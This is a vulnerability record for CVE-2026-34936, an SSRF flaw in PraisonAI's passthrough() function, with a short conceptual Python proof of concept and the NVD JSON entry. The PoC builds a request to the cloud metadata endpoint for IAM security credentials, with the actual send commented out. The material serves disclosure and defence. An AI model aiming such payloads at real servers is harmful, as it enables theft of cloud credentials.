CVE-2026-34936

# PoC for CVE-2026-34936 (Conceptual) # This demonstrates how a malicious api_base can trigger an SSRF. import httpx def simulate_vulnerable_passthrough(api_base, endpoint): """ Simulates the vulnerable passthrough() function in PraisonAI < 4.5.90. It concatenates api_base and endpoint without validation. """ # Vulnerability: No validation of URL scheme, IP filtering, or allowlist target_url = api_base + endpoint print(f"[DEBUG] Sending request to: {target_url}") try: # In the actual vulnerability, this request goes out from the server # response = httpx.Client().request("GET", target_url) # return response.text return f"Request would be sent to: {target_url}" except Exception as e: return str(e) # Attack Scenario: Accessing internal AWS metadata malicious_api_base = "http://169.254.169.254/latest/meta-data/" internal_endpoint = "iam/security-credentials/role" # Execute the vulnerable function result = simulate_vulnerable_passthrough(malicious_api_base, internal_endpoint) print(result)

{"cve": {"id": "CVE-2026-34936", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:05.853", "lastModified": "2026-04-14T18:14:29.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to version 4.5.90, passthrough() and apassthrough() in praisonai accept a caller-controlled api_base parameter that is concatenated with endpoint and passed directly to httpx.Client.request() when the litellm primary path raises AttributeError. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server. This issue has been patched in version 4.5.90."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.90", "matchCriteriaId": "072B6350-7972-417B-8540-DAAFF3230EC7"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x6m9-gxvr-7jpv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x6m9-gxvr-7jpv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}